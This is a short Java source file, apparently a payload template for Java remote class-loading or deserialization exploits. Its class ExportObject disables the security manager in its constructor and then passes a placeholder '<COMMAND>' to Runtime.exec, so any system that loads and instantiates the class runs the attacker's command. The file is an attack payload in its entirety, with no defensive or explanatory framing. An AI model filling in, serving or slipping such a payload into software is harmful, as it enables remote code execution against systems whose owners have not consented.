import java.io.File;
import java.io.IOException;

public class ExportObject {

	public ExportObject() {
		try {
			System.setSecurityManager(null);
			java.lang.Runtime.getRuntime().exec("<COMMAND>");
		} catch(Exception e) {
			e.printStackTrace();
		}
	}
}